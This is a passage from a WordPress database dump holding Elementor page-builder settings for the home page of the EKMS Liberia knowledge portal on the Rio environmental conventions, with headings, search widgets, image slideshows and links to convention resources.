fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16942,2536,'_elementor_version','2.7.5'),(16943,2536,'_elementor_template_type','wp-page'),(16944,2536,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16946,2537,'_wp_page_template','default'),(16947,2537,'_elementor_edit_mode','builder'),(16948,2537,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"],\"limit_query\":10,\"post_content_length\":20},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16949,2537,'_elementor_version','2.7.5'),(16950,2537,'_elementor_template_type','wp-page'),(16951,2537,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16952,2537,'_elementor_controls_usage','a:11:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:5;s:5:\"align\";i:3;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:8:{s:11:\"title_color\";i:5;s:21:\"typography_typography\";i:5;s:20:\"typography_font_size\";i:5;s:25:\"typography_text_transform\";i:1;s:25:\"typography_letter_spacing\";i:1;s:27:\"typography_font_size_mobile\";i:1;s:22:\"typography_font_family\";i:1;s:22:\"typography_font_weight\";i:3;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:1;s:12:\"_css_classes\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:8:{s:5:\"align\";i:1;s:10:\"text_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:22:\"typography_font_family\";i:1;s:22:\"typography_line_height\";i:1;s:25:\"typography_letter_spacing\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:15:\"jet-ajax-search\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:4:{s:28:\"section_search_form_settings\";a:4:{s:23:\"search_placeholder_text\";i:1;s:25:\"show_search_category_list\";i:1;s:34:\"search_category_select_placeholder\";i:1;s:15:\"search_taxonomy\";i:1;}s:29:\"section_results_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}s:23:\"section_search_settings\";a:2:{s:13:\"search_source\";i:1;s:11:\"limit_query\";i:1;}s:29:\"section_results_area_settings\";a:1:{s:19:\"post_content_length\";i:1;}}s:5:\"style\";a:2:{s:27:\"section_search_submit_style\";a:1:{s:22:\"search_submit_